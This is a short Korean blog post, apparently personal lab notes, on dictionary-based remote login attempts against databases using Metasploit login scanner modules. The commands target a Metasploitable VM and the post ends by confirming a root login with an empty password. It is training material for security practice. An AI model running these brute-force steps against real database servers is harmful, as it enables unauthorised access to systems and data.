Self-Improvement
사전파일을 이용한 DB 원격 로그인 시도 본문
*DB종류 msf 모듈 위치
MySQL : auxiliary/scanner/mysql/mysql_login
MSSQL : auxiliary/scanner/mssql/mssql_login
Oracle : auxiliary/scanner/oracle/oracle_login
PostgreSQL : auxiliary/scanner/postgres/postgres_login
*MySQL DB 실습
(kali)
#nmap -sV 192.168.10.134
#msfconsole
msf > search mysql_login
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
msf auxiliary(mysql_login) > set rhosts 192.168.10.134
msf auxiliary(mysql_login) > run
※Dirctionary파일을 지정을 안해서 안되어짐
msf auxiliary(mysql_login) > set USER_FILE Filename1
msf auxiliary(mysql_login) > set PASS_FILE Filename2
msf auxiliary(mysql_login) > show options
msf auxiliary(mysql_login) > run
msf auxiliary(mysql_login) > quit
*확인
Metasploitable 서버에서 확인해보기 아이디는 root 비밀번호는 빈칸이다.
성공적인 로그인 확인
'Kali Linux > Metasploitable' 카테고리의 다른 글
Debian OpenSSL Predictable PRNG Brute Force SSH (0) | 2018.10.21 |
---|---|
TCP Syn Flooding 실습 (0) | 2018.10.21 |
Metasploit (= Meta Exploit Framework), Matasploitable 설치 (0) | 2018.10.21 |
rlogin Service Detection 취약점 (0) | 2018.10.21 |
DistCC Remote Code Execution Vulnerability 취약점 (0) | 2018.10.21 |